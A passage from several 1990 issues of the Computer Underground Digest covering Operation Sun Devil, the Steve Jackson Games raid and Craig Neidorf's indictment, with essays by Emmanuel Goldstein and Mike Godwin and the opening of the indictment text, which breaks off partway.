accessed computers belonging to federal research centers, schools and
private businesses. King would not name any of the victims involved.
Rose was associated with the Legion of Doom and operated his own computer
system known as Netsys, according to the indictment. His electronic mailing
address was Netsys!len, the document said.
The Legion, according to the indictment, gained fraudulent, unauthorized
access to computer systems for the purpose of stealing software; stole
proprietary source code and other information; disseminated information
about gaining illegal access, and made telephone calls at the expense of
other people.
Well that is the latest in the Summer '90 busts. I just hope that everyone
arrested by the government receives as fair a deal that Robert Morris
received for his little prank. Because I doubt Mr. Morris was given
special treatment because his dad works for the NSA...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
+ END THIS FILE +
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+===+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
***************************************************************
*** Computer Underground Digest Issue #1.13 / File 4 of 5 ***
***************************************************************
*** CRITIQUE OF TELECOM DIGEST'S POSITON ON THE CURRENT BUSTS ***
(By Emmanuel Goldstein)
=====================
It's real disturbing to read the comments that have been posted recently on
Telecom Digest concerning Operation Sun Devil and Mitch Kapor's involvement.
While I think the moderator has been chastised sufficiently, there are still a
few remarks I want to make.
First of all, I understand the point he was trying to get across. But I think
he shot from the hip without rationalizing his point first, thereby leaving
many of us in a kind of stunned silence. If I understand it correctly, the
argument is: Kapor says he wants to help people that the moderator believes
are thieves. Therefore, using that logic, it's okay to steal from Kapor.
Well, I don't agree. Obviously, Kapor DOESN'T believe these people are
criminals. Even if one or two of them ARE criminals, he is concerned with all
of the innocent bystanders that are being victimized here. And make no mistake
about that - there are many innocent bystanders here. I've spoken to quite a
few of them. Steve Jackson, Craig Neidorf, the friends and families of people
who've had armed agents of the federal government storm into their homes and
offices. It's a very frightening scenario - one that I've been through myself.
And when it happens there are permanent scars and a fear that never quite
leaves. For drug dealers, murderers, hardened criminals, it's an acceptable
price in my view. But a 14 year old kid who doesn't know when to stop
exploring a computer system? Let's get real. Do we really want to mess up
someone's life just to send a message?
I've been a hacker for a good part of my life. Years ago, I was what you
would call an "active" hacker, that is, I wandered about on computer systems
and explored. Throughout it all, I knew it would be wrong to mess up data or
do something that would cause harm to a system. I was taught to respect
tangible objects; extending that to encompass intangible objects was not
very hard to do. And most, if not all, of the people I explored with felt
the same way. Nobody sold their knowledge. The only profit we got was an
education that far surpassed any computer class or manual.
Eventually, though, I was caught. But fortunately for me, the witch-hunt
mentality hadn't caught on yet. I cooperated with the authorities, explained
how the systems I used were flawed, and proved that there was no harm done. I
had to pay for the computer time I used and if I stayed out of trouble, I
would have no criminal record. They didn't crush my spirit. And the computers
I used became more secure. Except for the fear and intimidation that occurred
during my series of raids, I think I was dealt with fairly.
Now I publish a hacker magazine. And in a way, it's an extension of that
experience. The hackers are able to learn all about many different computer
and phone systems. And those running the systems, IF THEY ARE SMART, listen
to what is being said and learn valuable lessons before it's too late.
Because sooner or later, someone will figure out a way to get in. And you'd
better hope it's a hacker who can help you figure out ways to improve the
system and not an ex-employee with a monumental grudge.
In all fairness, I've been hacked myself. Someone figured out a way to break
the code for my answering machine once. Sure, I was angry. At the company.
They had no conception of what security was. I bought a new machine from a
different company, but not before letting a lot of people know EXACTLY what
happened. And I've had people figure out my calling card numbers. This gave
me firsthand knowledge of the ineptitude of the phone companies. And I used
to think they understood their own field! My point is: you're only a victim
if you refuse to learn. If I do something stupid like empty my china cabinet
on the front lawn and leave it there for three weeks, I don't think many
people will feel sympathetic if it doesn't quite work out. And I don't think
we should be sympathetic towards companies and organizations that obviously
don't know the first thing about security and very often are entrusted with
important data.
The oldest hacker analogy is the walking-in-through-the-front-door-and-
rummaging-through-my-personal-belongings one. I believe the moderator
recently asked a critic if he would leave his door unlocked so he could drop
in and rummage. The one fact that always seems to be missed with this
analogy is that an individual's belongings are just not interesting to
someone who simply wants to learn. But they ARE interesting to someone who
wants to steal. A big corporation's computer system is not interesting to
someone who wants to steal, UNLESS they have very specific knowledge as to
how to do this (which eliminates the hacker aspect). But that system is a
treasure trove for those interested in LEARNING. To those that insist on
using this old analogy, I say at least be consistent. You wouldn't threaten
somebody with 30 years in jail for taking something from a house. What's
especially ironic is that your personal belongings are probably much more
secure than the data in the nation's largest computer systems!
When you refer to hacking as "burglary and theft", as the moderator
frequently does, it becomes easy to think of these people as hardened
criminals. But it's just not the case. I don't know any burglars or
thieves, yet I hang out with an awful lot of hackers. It serves a definite
purpose to blur the distinction, just as pro-democracy demonstrators are
referred to as rioters by nervous leaders. Those who have staked a claim
in the industry fear that the hackers will reveal vulnerabilities in their
systems that they would just as soon forget about. It would have been very
easy for Mitch Kapor to join the bandwagon on this. The fact that he
didn't tells me something about his character. And he's not the only one.
Since we published what was, to the best of my knowledge, the first pro-hacker
article on all of these raids, we've been startled by the intensity of the
feedback we've gotten. A lot of people are angry, upset, and frightened by
what the Secret Service is doing. They're speaking out and communicating their
outrage to other people who we could never have reached. And they've
apparently had these feelings for some time. Is this the anti-government bias
our moderator accused another writer of harboring? Hardly. This is America at
its finest.
Emmanuel Goldstein
Editor, 2600 Magazine - The Hacker Quarterly
emma...@well.sf.ca.us po box 752, middle island, ny 11953
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
+ END THIS FILE +
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+===+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
***************************************************************
*** Computer Underground Digest Issue #1.13 / File 5 of 5 ***
***************************************************************
------------------------------
Date: 27 May 90 03:50:07 EDT (Sun)
From: a...@m-net.ann-arbor.mi.us (Brian Sherwood)
Subject: Steve Jackson Games & A.B. 3280
> Computer Gaming World (Golden Empire Publications)
> June, 1990, Number 72, Page 8
> Editorial by Johnny L. Wilson
It CAN Happen Here
Although Nobel Prize-winning novelist Sinclair Lewis is probably best
known for 'Main Street', 'Babbitt', 'Elmer Gantry', and 'Arrowsmith', my
personal favorites are 'It Can't Happen Here' and 'Kingsblood Royal'. The
latter is an ironic narrative in which who suffers from racial prejudice
toward the black population discovers, through genealogical research, that
he himself has black ancestors. The protagonist experienced a
life-challenging discovery that enabled Lewis to preach a gospel of civil
rights to his readership.
The former is, perhaps, Lewis' most lengthy novel and it tells how a
radio evangelist was able to use the issues of morality and national
security to form a national mandate and create a fascist dictatorship in
the United States. As Lewis showed how patriotic symbolism could be
distorted by power-hungry elite and religious fervor channeled into a
political movement, I was personally shaken. As a highschool student,
reading this novel, for the first time, I suddenly realized what lewis
intended for his readers to realize. "It" (a dictatorship) really CAN
happen here, There is an infinitesimally fine line between protecting the
interests of society and encumbering the freedoms of the self-same society
in the name of protection.
Now it appears that the civil liberties of game designers and gamers
themselves are to be assaulted in the name of protecting society. In
recent months two unrelated events have taken place which must make us
pause: the raiding of Steve Jackson Games' offices by the United States
Secret Service, and the introduction of A.B. 3280 into the California State
Assembly by Assemblyperson Tanner.
On March 1, 1990, Steve Jackson Games (a small pen and paper game
company) was raided by agents of the United States Secret Service. The
raid was allegedly part of an investigation into data piracy and was,
apparently, related to the latest supplement from SJG entitled, GURPS
Cyberpunk (GURPS stands for Generic Universal Role-Playing System). GURPS
Cyberpunk features rules for a game universe analogous to the dark futures
of George Alec Effinger ('When Gravity Fails'), William Gibson
('Neuromancer'), Norman Spinrad ('Little Heroes'), Bruce Sterling ('Islands
in the Net'), and Walter Jon Williams ('Hardwired').
GURPS Cyberpunk features character related to breaking into networks and
phreaking (abusing the telephone system).Hence, certain federal agents are
reported to have made several disparaging remarks about the game rules
being a "handbook for computer crime". In the course of the raid (reported
to have been conducted under the authority of an unsigned photocopy of a
warrant; at least, such was the only warrant showed to the employees at
SJG) significant destruction allegedly occurred. A footlocker, as well as
exterior storage units and cartons, were deliberately forced open even
though an employee with appropriate keys was present and available to lend
assistance. In addition, the materials confiscated included: two
computers, an HP Laserjet II printer, a variety of computer cards and
parts, and an assortment of commercial software. In all, SJG estimates
that approximately $10,000 worth of computer hardware and software was
confiscated.
The amorphous nature of the raid is what is most frightening to me. Does
this raid indicate that those who operate bulletin board systems as
individuals are at risk for similar raids if someone posts "hacking"
information on their computer? Or does it indicate that games which
involve "hacking" are subject to searches and seizures by the federal
government? Does it indicate that writing about "hacking" exposes one to
the risk of a raid? It seems that this raid goes over the line of
protecting society and has, instead, violated the freedom of its citizenry.
Further facts may indicate that this is not the case, but the first
impression strongly indicates an abuse of freedom.
Then there is the case of California's A.B 3280 which would forbid the
depiction of any alcohol or tobacco package or container in any video game
intended primarily for use by minors. The bill makes no distinction
between positive or negative depiction of alcohol or tobacco, does not
specify what "primarily designed for" means, and defines 'video game' in
such a way that coin-ops, dedicated game machines, and computer games can
all fit within the category.
Now the law is, admittedly, intended to help curb the use and abuse of
alcohol and tobacco among minors. Yet the broad stroke of the brush with
which it is written limits the dramatic license which can be used to make
even desirable points in computer games. For example, Chris Crawford's
'Balance of the Planet' depicts a liquor bottle on a trash heap as part of
a screen talking about the garbage problem. Does this encourage alcohol
abuse? In 'Wasteland', one of the encounters involves two winos in an
alley. Does their use of homemade white lightening commend it to any
minors that might be playing the game?
One of the problems with legislating art is that art is designed to both
reflect and cast new light and new perspectives on life. As such,
depiction of any aspect of life may be appropriate, in context.
Unfortunately for those who want to use the law as a means of enforcing
morality, laws cannot be written to cover every context.
We urge our California readers to oppose A.B. 3280 and help defend our
basic freedoms. We urge all of our readers to be on the alert for any
governmental intervention that threatens our freedom of expression. "It"
not only CAN happen here, but "it" is very likely to if we are not careful.
Si_Druid
****************************************************************************
>C O M P U T E R U N D E R G R O U N D<
>D I G E S T<
*** Volume 1, Issue #1.14 (June 14, 1990) **
****************************************************************************
MODERATORS: Jim Thomas / Gordon Meyer
REPLY TO: TK0...@NIU.bitnet
COMPUTER UNDERGROUND DIGEST is an open forum dedicated to sharing
information among computerists and to the presentation and debate of
diverse views.
--------------------------------------------------------------------
DISCLAIMER: The views represented herein do not necessarily represent the
views of the moderators. Contributors assume all responsibility
for assuring that articles submitted do not violate copyright
protections.
--------------------------------------------------------------------
In This Issue:
File 1: Moderators' Comments
File 2: Mail: 1) SS jurisdiction; 2) Busts
File 3: Craig Neidorf's New Indictment (Gordon Meyer)
File 4: Is this Evidence (response to indictment, Jim Thomas)
File 5: Mike Godwin on Search Warrants etc.
--------------------------------------------------------------------
***************************************************************
*** Computer Underground Digest Issue #1.14 / File 1 of 5 ***
***************************************************************
----------------
Gordon Meyer's Subversive Thesis
-----------------
An inside source reported to us that Omar Stanford, who was indicted in
Missouri for alleged phreaking, has had all the charges against him dropped
by local authorities. They also returned all of his software and
equipment......EXCEPT FOR the infamous M.A. thesis by Gordon Meyer. No
reason was given for the failure to return it.
-------------------
Withdrawal of Some Archives
--------------------
We have been informed that files to be used for evidence against Craig
Neidorf include those in our archives. As a result, we will not accept
requests for Phracks 19, 22, 23 or 24. Although we find such repression
abhorent, and although it would seem to constitute a challenge to
legitimate research interests, we feel it best to err on the side of
caution and have succumbed to the "chilling effect."
***************************************************************
*** Computer Underground Digest Issue #1.14 / File 2 of 5 ***
***************************************************************
-------------
Forwarded from Telecom Digest
-------------
In article <88...@accuvax.nwu.edu> he...@garp.mit.edu writes:
>
>In reply to Frank Earl's note ... I would reckon one of the problems
>is that most people don't know where the FBI's jurisdiction begins or
>where the Secret Service's jurisdiction ends. I had a visit on Friday
>afternoon from an FBI agent and it seemed to be mostly reasonable,
>except he identified himself as being from a unit that I wouldn't
>associate with this sort of investigation.
Secret Service jurisdiction over computer crimes is set out in
18 USC 1030(d):
The United States Secret Service shall, in addition to any other agency
having such authority, have the authority to investigate offenses under
this section. [18 USC 1030 is titled "Fraud and related activity in
connection with computers.] Such authority of the United States Secret
Service shall be exercised in accordance with an agreement which shall
be entered into by the Secretary of the Treasury and the Attorney
General.
There is a similar provision in 18 USC 1029, which concerns
"Fraud and related activity in connection with access devices."
Mike Godwin, UT Law School
------------------
********************************************************************
-------------------
The following is an anonymous submission.
-------------------
Can someone answer the following?
Operation Sun Devil is a two year investigation. If I'm counting right,
including the number of federal and state officers involved in serving
search warrants, at least 300 were involved in some capacity.
Also, if I'm counting right, there have been only 9 arrests:
1) One guy in California who was arrested during a search on
an unrelated charge (weapon's possession)(Doc Ripco?)
2) One guy in Chicago who was arrested during the search on an
unrelated charge (weapons)
3) A woman in Pittsburgh (Electra?)
4) Terminus in New Jersey
5) Anthony Nusall in Tucson
6) Craig Neidorf (for publishing phrack)
7) Robert Riggs (for E911 documents)
8) Adam Grant (Atlanta)
9) Frank Darden (Atlanata)
The first four were busted in January, and the last four in the last month.
So, of the 9, only 7 were busted on computer-related charges. Of the 7,
the charges seem bogus at best, such as Craig Neidorf's, if the information
I've read is even half accurate.
Now, here's my question: If warrants are supposed to indicate a crime has
been committed, shouldn't there be more arrests if there is such a crime
wave out there? After all that time, all that investigation, all that
hype---where's all the crooks??
I suppose the cops could say it takes time to collect evidence. But aren't
they supposed to have evidence when they get the search warrants? How long
can it possibly take to acquire evidence if the groundwork has already been
laid and if cops supposedly know what they're looking for?? Am I missing
something? Will other charges be like those reported against Craig--for
publishing? If I havae phrack 24 and the E911 file, does that make me a
crook? If I uploaded it to a board. Can that board be busted for receiving
stolen information?
Maybe I'm missing something, but is there something wrong here?
Where is this giant conspiracy? Where is all the harm that's going on? I
guess the cops would say they can't talk while an investigation is going
on, but hasn't it been going on for years? Shouldn't they have something
they can convey other than general notions of threats to national security,
huge losses, major conspiracies, and the rest of their babble?
Is there something wrong with this picture??
<je>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
+ END THIS FILE +
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+===+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
***************************************************************
*** Computer Underground Digest Issue #1.14 / File 3 of 5 ***
***************************************************************
*****************************************
PHRACK/KNIGHT LIGHTNING INDICTMENT UPDATE
*****************************************
On June 12, 1990 Craig Neidorf (aka "Knight Lightning") was arraigned on
charges of Wire Fraud and Interstate Transportation of Stolen Merchandise.
This new indictment supersedes the charges that were filed against him a
few months ago. Note that the violation of the Computer Fraud charge has
been dropped, with the wire fraud charges being added. The interstate
transportation charge remains and is still related to his alleged receipt
of the e911 documentation.
The new Wire Fraud charges stem from 4 or 5 articles in past issues of
"Phrack Inc.". A discussion of the specific articles named in the
indictment is found elsewhere in this issue of CuD.
Two additional changes are worth noting. The "retail cost" of the Bell
South e911 documentation has been reduced from over $74K to $53K.
Evidently the initial estimate was incorrectly calculated. Also, now that
the fraud charge has been dropped mandatory sentencing guidelines may no
longer require jail time should Niedorf be convicted. (This is speculation
and has not been confirmed.)
A new trial date has been set for July 23 (possibly the 24th, our sources
were unsure of the exact date). The trial is expected to last about one
week. The government still plans to call 13 witnesses, some of which are
still unnamed (being listed as "a representative from Bell South, for
example).
As of this writing we have not been able to obtain a copy of the indictment
itself. However, the information given here has been provided by those who
have seen copies of it. There may be some errors, which will be corrected
once we can compare our synopsis to the actual document. We were able to
obtain a copy of the first indictment with relatively little hassle,
however we have been told by both the US Attorney's office and the US
Secret Service that this time we'll have to pick up a copy in person
(which, to be fair, is standard operating procedure but it is a requirement
that we did not anticipate). We will do so as soon as an opportunity to
visit downtown Chicago arises. In the meantime if any CuD readers have a
copy of the new indictment we would appreciate you forwarding a copy to us.
As always we will continue to provide you with information as it becomes
available.
GRM 6/13/90
Related rumours and speculation: Sources indicate that much of the material
being introduced as evidence by the Government has been sealed by the
court. Additionally some people connected with the case are under a court
order not to discuss certain aspects of it prior to the trial. The full
reasoning behind this, and exactly what types of material it covers, is
unknown at this time. This propensity to keep the details out of public
scrutiny has led to speculation (from different sources) that the trial
itself may take place behind closed doors.
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
+ END THIS FILE +
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+===+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
***************************************************************
*** Computer Underground Digest Issue #1.14 / File 4 of 5 ***
***************************************************************
We have not yet seen a copy of Craig Neidorf's June 12 indictment, but we
are told that Phrack #19 (file 7) and Phrack #23 (file 3) will be
introduced as evidence. We are also told that this stuff is sealed, so it
would be unwise for anybody to request (or distribute) these files.
PHRACK 19 (file 7, "Phrack World News"): This file announces that The
Phoenix Project BBS returned on-line, and summarizes some general
information. We are given the dictionary definitions of the terms
"phoenix" and "project." We are told that Summer-con '87 was held on
schedule, and that summer-con '88 would occur. We told that The Metal Shop
BBS is down, perhaps permanently. Personnel from industry and law
enforcement are explicitely invited to attend Summer-con '88. Dangerous
stuff.
PHRACK #23, File 3 (Part III of The Vicious Circle Trilogy). If it is true
that this file will be used as evidence, we cannot comprehend what it is
supposed to prove. It is a list of CU groups that have existed, and the
premise of the article is that joining groups is a status thing and of no
particular value. It discusses John Maxfield's work assessing the number of
phreaks and hackers across the country, provides a logon application
required by one p/h board, and discusses possible government informants who
may have infiltrated various groups. There is nothing here that cannot be
found in a media article or in the works of Maxfield or Donn Parker.
PHRACK #22, Files 1, 4, 5, and 6: File 1 announces, for those who may not
have figured it out, that some old-time hackers now have jobs, but that
some still like to maintain links to the community. No names are mentioned
in this revealing blurb. It also informs readers that Phrack will publish
anonymous articles and provide E-mail delivery to legitimate accounts. The
editors request submissions and provide an index of files in this issue.
File 4 is a version of "The State of the Hack" entitled "A Novice's Guide
to Hacking- 1989 edition." It is divided into four parts:
Part 1: What is Hacking, A Hacker's Code of Ethics, Basic Hacking Safety
Part 2: Packet Switching Networks: Telenet- How it Works, How to Use it,
Outdials, Network Servers, Private PADs
Part 3: Identifying a Computer, How to Hack In, Operating System Defaults
Part 4: Conclusion; Final Thoughts, Books to Read, Boards to Call,
It is essentially an essay with some basic technical information available
in any computer science course integrated in.
Files 5 and 6 would appear to be the most serious of the files. Both are
labelled as Unix hacking tips. This may be more a rhetorical ploy than
anything substantive. The "tips" provided can be found in help files, text
books, over-the-counter type manuals, and many, many other sources. These
files are really little more than a guide on how to use Unix. File 6,
however, does discuss how passwords might be hacked. But, so does Stoll's
The Cuckoo's Egg, and one in fact learns more from Stoll's book than from
these files. If the authors of these files had added some sex, perhaps a
murder or two, and told a few funny stories, they, too, might have had a
best seller.
Having re-read these files, some troubling questions arise.
1. It appears that the charges against Craig have shifted from the E911
files to the content of what he has published. If found guilty, would a
precedent be set that allows agents to indict anybody who prints
information about entering a computer system? Would it allow prosecution of
people who support hacking, even though they themselves have not engaged in
any illegal activities?
2. Where would the line be drawn between legitimate and illigetimate
information? Stoll's book provides a useful primer for a would-be Unix
hacker. Could Stoll be indicted? What about Levy's Out of the Inner
Circle? That book, published by Microsoft, provides explicit detail on
hacking techniques. What about computer courses in a unversity? If an
instructor provides details on how to use Unix that one could then apply
in attempting to hack a system, would that instructor be liable? What
protections would exist for teaching computer use?
3. What is the liability of anybody who possesses a copy of the Phracks in
question? What happens if they upload one to another board? If a caller to
a board, ignorant of the current witch hunt mentality, uploads a Phrack for
upload credit, as many do, then would that user be liable? Would that
constitute sufficient grounds for a search warrant that would allow
confiscation of computer equipment?
4. What is the liability of sysops? Should they remove text files for fear
that they might be raided or harrassed, even if those files are not illegal
on the fear that they might SOMEDAY be deemed illegal and justify
prosecution?
5. What happens, as occasionally does, if an attorney asks the moderators
of CuD for a copy of Phrack #22 or the E911 file? If we send it, have we
committed a crime? If the recipient accepts it has a second crime occured?
It seems that federal agents are not particularly interested in clarifying
these issues. It leaves the status of distribution of information in limbo
and turns the "chilling effect" into a sub-zero ice storm. Perhaps this is
what they want. It strikes us as quite irresponsible.
Perhaps we are wrong, and these files are not, in fact, in question. If
not, then we are worrying for nothing. If, however, we are correct, then it
seems that the very future of electronic communication currently hangs in
the balance. Case and statute law being formulated today will provide the
protections (or lack of them) for the computer world for the coming
decades. The future seems to lie in electronic communication and
information flow. Without establishing protections now, we are committing
ourselves to a bleak future indeed.
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
+ END THIS FILE +
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+===+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
***************************************************************
*** Computer Underground Digest Issue #1.14 / File 5 of 5 ***
***************************************************************
-------------
The following was sent simultaneously to CuD and to Telecom Digest
Mike Godwin. Pat was not able to print it, so we reprint it here.
It is a response to a TCD contributor criticizing those who are
uncomfortable with the current witch hunts.
--------------
-----------------------------------------------------------------
Newsgroups: comp.dcom.telecom
Subject: Re: Update: LOD Woes - Part II of II
References: <87...@accuvax.nwu.edu>
Reply-To: mnem...@dopey.cc.utexas.edu.UUCP (Mike Godwin)
Distribution:
Organization: The University of Texas at Austin, Austin, Texas
In article <87...@accuvax.nwu.edu>, in a posting titled "Law 101," Frank E.
Carey writes:
>The signal to noise ratio is becoming intolerable. Let's go back to
>FACTS and LOGIC.
Unfortunately, much of what Frank subsequently says about law-enforcement
procedures in this country is either nonfactual or illogical or both.
>Searches and seizures are authorized by warrants. If anybody believes
>that the government raids were done without warrants I'm sure we'd all
>like to hear about it. Whether warrants were obtained should be a
>verifiable fact.
So far as I know, there has been no dispute as to whether any of the
Operation Sun Devil searches and seizures were warrantless. Critics of this
operation are not claiming that the searches and seizures lacked warrants,
but that the warrant-approval process has proved to be an insufficient
protection of Fourth Amendment rights.
This comes as no surprise, of course, to those who have more than a high
school civics textbook familiarity with criminal procedure.
>Warrants are issued by judges and are based on evidence.
Not exactly. Typically, warrants are issued by judges (or some other
"neutral magistrate") on the basis of affidavits written by law-enforcement
agents. The agents describe and characterize the illegal activity they seek
to investigate. So long as the FORM of warrant-seeking procedure is adhered
to, the content of the warrant is rarely (one is tempted to say "never,"
but that's not quite true) inquired into by the judge. The procedure is
NONadversarial--that is, there's no one there to challenge the
law-enforcement agent's characterization of the facts. So long as the judge
has no reason to believe that the agent is INVENTING facts, she'll normally
approve the warrant.
But the agent's good faith is NOT a measure of the accuracy of the
information contained in a warrant, especially in computer-crime cases, in
which the very nature of the property crime is being defined in the process
of prosecuting alleged wrongdoers. (These are the cases that will set the
precedents for how the federal computer-crime law will be interpreted in
the future.)
There is little doubt that the agents have a good-faith belief that they
are going after genuine wrongdoers. But to assume that law-enforcement
officials have any kind of *objective* sense of the magnitude and damage of
the "crimes" being prosecuted here is to misunderstand the character of
federal law-enforcement--generally, these are a bunch of zealous (and
sometimes over-zealous) policemen who tend to define the reach of federal
crime statutes VERY broadly.
>Any
>information suggesting that warrants were improperly issued or that
>evidence was fictitious, falsified, illegally obtained, etc. would
>probably be welcomed in this forum. I think warrants are public
>information.
This is more or less a non sequitur. It ignores the fact that warrants,
like indictments, are *rhetorical* documents, designed to convince the
reader that the goals of the writer are correct. The question is not
whether the facts are wrong, but how they are characterized for rhetorical
purposes.
>If we can determine that searches were done with properly issued
>warrants we would have a situation that would be closer to due process
>than "abridging of First Amendment rights".
This assumes that if the Fifth Amendment requirement of Due Process (as
well as, I assume, the Fourth Amendment requirement of "reasonable"
searches and seizures), there can be no First Amendment interests at stake.
This is a misreading of Constitutional Law; the requirements of the
respective Amendments must be met independently of each other.
>Indictments are handed down by grand juries - your peers. Indictments
>are based on evidence and are customarily (depending on jurisdiction)
>judgments that the evidence, if not refuted, is sufficient for a
>reasonable presumption of guilt.
This is incorrect. The presumption of innocence is never overcome by
grand-jury indictments, even if the allegations contained therein are
unrefuted.
Properly, one should say that a grand-jury indictment reflects a prima
facie case against the defendant(s), who are nevertheless presumed innocent
until judged guilty beyond a reasonable doubt.
>INDICTMENTS ALSO SERVE TO PROTECT
>THE ACCUSED AGAINST FRIVOLOUS PROSECUTIONS.
No, they do not. The grand-jury process is NOT a screen against any kind of
prosecution, regardless of what you may have been told. Patrick allowed in
his comment to your letter that "sometimes" grand juries are merely
rubber-stamps for prosecutors. "Sometimes" actually is "the great majority
of the time"--it was not for nothing that Rudy Giuliani said he could get
the jury to indict a ham sandwich. Grand-jury proceedings are orchestrated
by prosecutors, and no one has a right to have her attorney present when
questioned by the grand jury.
>Once you have been indicted you
>go to trial. The indictment is not a guilty verdict!
No, but it vastly increases the likelihood of one, especially if it comes
from a federal grand jury. Assuming that you can afford the cost of
defending yourself in federal court (most people find the cost crippling),
you're up against an organization that has fact-gathering organizations in
every state in the U.S., and whose agents have automatic credibility with
most jurors.
>It's hard for
>me to conclude that indictment by grand jury constitutes harassment by
>government.
How soon we forget the 1960s!
>If you don't like the grand jury process or you don't
>trust your peers to evaluate evidence you've got a more fundamental
>problem that probably belongs in net.politics.
Or, perhaps, on misc.legal, where this topic has been discussed in the
past.
>Some postings imply that motive or resulting damage should be a factor
>in these cases. I think we need to read the law and look at the way
>the courts apply the law. It's not helpful to argue a case on the
>basis of what you think the law should be.
Sure it is, when the law is being interpreted in new and more expansive ways.
Moreover, given the fact that even unindicted third parties can be crippled by
overzealous (but warranted) seizures, Fourth Amendment interests require that
we tell judges and legislators how we think the law should be interpreted.
>Perhaps the biggest problem some of you have with the raids, seizures,
>is that you don't like the law. If that's the case go see your
>congressman and stop flaming the law enforcement people.
This statement assumes that law-enforcement folks have no discretion in how
they conduct their searches or prosecutions. This is untrue. Some
law-enforcement agents have a great deal of respect for the Constitution,
while others have an us/them mentality that motivates them to pay only
cursory attention to the Constitutional interests at stake.
>The common carrier issue is one of the few lucid topics to surface
>recently. Indeed, we don't arrest the UPS guy for delivering a
>package of stolen property and we don't sieze the mail truck when it
>contains stolen documents being mailed. Is the law weak on this
>aspect of computer crime?
Yes, indeed. Which is one of the main problems.
>Should sysops be treated as common
>carriers? Would this solve some problems but create others? I'd be
>interested in opinions on this.
Sysops who received common-carrier status would be a bit dismayed at their
inability to deny access to some users. What is needed is a new status,
somewhere between common-carrier and private-operator status. Such a
middle ground would allow sysops to control their user bases while not
being required to read every bit of verbal information that is transferred
into or through their systems.
>Disclaimer: I'm not an attorney and I have no personal connection
>with any of the discussed cases. My views may be colored by the
>report in UNIX Today 5/28/90 that Leonard Rose was accused of
>stealing source code from my employer.
It may be that Len Rose was indicted for "stealing source code" (I haven't
seen that particular indictment), but the other Legion of Doom indictments
concern the alleged "theft" of an E911 text document. Many newspapers and
journals have misreported this.
Disclaimer: I have a law degree, but until I take and pass the bar exam, I
won't be a lawyer, either.
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
+ END C-u-D, #1.14 +
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+===+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
--
Si
Si_Druid
****************************************************************************
>C O M P U T E R U N D E R G R O U N D<
>D I G E S T<
*** Volume 1, Issue #1.15 (June 16, 1990) **
****************************************************************************
MODERATORS: Jim Thomas / Gordon Meyer
REPLY TO: TK0...@NIU.bitnet
COMPUTER UNDERGROUND DIGEST is an open forum dedicated to sharing
information among computerists and to the presentation and debate of
diverse views.
--------------------------------------------------------------------
DISCLAIMER: The views represented herein do not necessarily represent the
views of the moderators. Contributors assume all responsibility
for assuring that articles submitted do not violate copyright
protections.
--------------------------------------------------------------------
*** SPECIAL ISSUE: June Indictment of Craig Neidorf ***
--------------------------------------------------------------------
The new indictment drops some charges and introduces others. The logic
required to connect the acts to the charges requires considerable
prosecutorial intellectual aerobics. We invite comments from all
perspectives. We again encourage law enforcement agents or sympathizers to
join the dialogue, because we believe that productive discussion is in the
interests of all in the computer world.
Moderators Note: This is a verbatim copy of the indictment, transcribed
from a third generation Fax/Photcopy of the original. As of this writing we
have been unable to obtain a copy from the US Government. While in the
past we were able to have materials mailed to us, upon inquiry this time we
were told by the that a copy would have to be picked up in person at the
Federal Building in downtown Chicago.
Special thanks go out to the CuD reader who supplied us with this copy,
saving us the trip downtown.
=====================================================================
UNITED STATES DISTRICT COURT
NORTHERN DISTRICT OF ILLINOIS
EASTERN DIVISION
UNITED STATES OF AMERICA )
)
v. ) No. 90 CR 70
) Violations : Title 18, United
ROBERT J. RIGGS, also known ) States Code, Sections
as Robert Johnson, also ) 1343 and 2314
known as Prophet, and )
CRAIG NEIDORF, also known )
as Knight Lightning )
_Count One_
The SPECIAL APRIL 1990 GRAND JURY charges:
_Introduction_
1. At all times relevant herein, Enhanced 911 (E911) was the
national computerized telephone service program for handling
emergency calls to the police, fire, ambulance and emergency
services in most municipalities in the United States. Dialing 911
provided the public immediate access to a municipality's Public
Safety Answering Point (PSAP) through the use of computerized call
routine. The E911 system also automatically provided the recipient
of an emergency call at the PSAP with the telephone number and
location identification of the emergency caller.
2. At all times relevant herein, the Bell South Telephone
Company and its subsidiaries (Bell South) provided telephone
services in the nine state area including Alabama, Mississippi,
Georgia, Tennessee, Kentucky, Louisiana, North Carolina, South
Carolina and Florida.
[end of page one]
_DEFINITION OF TERMS_
3. _The E911 Test File_ - At all times relevant herein, the
E911 system of Bell South was described in the computerized text
file known as the Bell South Standard Practice 660-225-104SV
Control Office Administration of Enhanced 911 Services for Special
and Major Account Centers, dated March 1988 (E911 text file). The
E911 text file was a highly proprietary and closely held
computerized text file belonging to the Bell South Telephone
Company and stored on the company's AIMS-X computer in Atlanta,
Georgia. The E911 text file described the computerized control,
maintenance and service of the E911 system and carried warning
notices that it was not to be disclosed outside Bell South or any
of its subsidiaries except under written agreement.
